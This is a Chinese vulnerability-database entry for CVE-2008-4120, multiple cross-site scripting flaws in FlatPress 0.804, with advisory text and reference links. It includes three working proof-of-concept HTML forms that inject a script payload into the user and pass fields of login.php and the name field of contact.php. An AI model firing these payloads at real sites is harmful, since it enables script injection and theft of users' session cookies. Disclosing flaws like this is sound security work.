FlatPress 多个跨站脚本攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1116218 漏洞类型 跨站脚本
发布时间 2008-09-25 更新时间 2008-09-26
CVE编号 CVE-2008-4120 CNNVD-ID CNNVD-200809-400
漏洞平台 PHP CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/32421
https://www.securityfocus.com/bid/31407
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200809-400
|漏洞详情
FlatPress是一个开源,符合标准(XHTMLvalid),基于Smarty模板引擎的个人博客系统。支持多语言,支持通过插件来可扩展功能。FlatPress0.804中存在多个跨站脚本攻击漏洞。远程攻击者可以通过(1)用户或(2)login.php的pass参数,或者(3)contact.php的名字参数,执行任意web脚本或HTML。
|漏洞EXP
source: http://www.securityfocus.com/bid/31407/info

FlatPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

Versions prior to FlatPress 0.804.1 are vulnerable. 

<form method="post" action="http://localhost/flatpress/login.php"> <input type="text" name="user" value='"><script>alert(1)</script>'> <input type=submit></form> <form method="post" action="http://localhost/flatpress/login.php"> <input type="text" name="pass" value='"><script>alert(1)</script>'> <input type=submit></form> <form method="post" action="http://localhost/flatpress/contact.php"> <input type="text" name="name" value='"><script>alert(1)</script>'> <input type=submit></form>
|受影响的产品
Edoardo Vacchi FlatPress 0.804
|参考资料

来源:BID
名称:31407
链接:http://www.securityfocus.com/bid/31407
来源:BUGTRAQ
名称:20080925CrossSiteScripting(XSS)Vulnerabilitiyinflatpress0.804,CVE-2008-4120
链接:http://www.securityfocus.com/archive/1/archive/1/496740/100/0/threaded
来源:www.flatpress.org
链接:http://www.flatpress.org/home/comments.php?entry=entry080925-180744
来源:MISC
链接:http://www.datensalat.eu/~fabian/cve/CVE-2008-4120-flatpress.html
来源:sourceforge.net
链接:http://sourceforge.net/project/shownotes.php?group_id=157089&release_id=628765_id=628765
来源:SREASON
名称:4324
链接:http://securityreason.com/securityalert/4324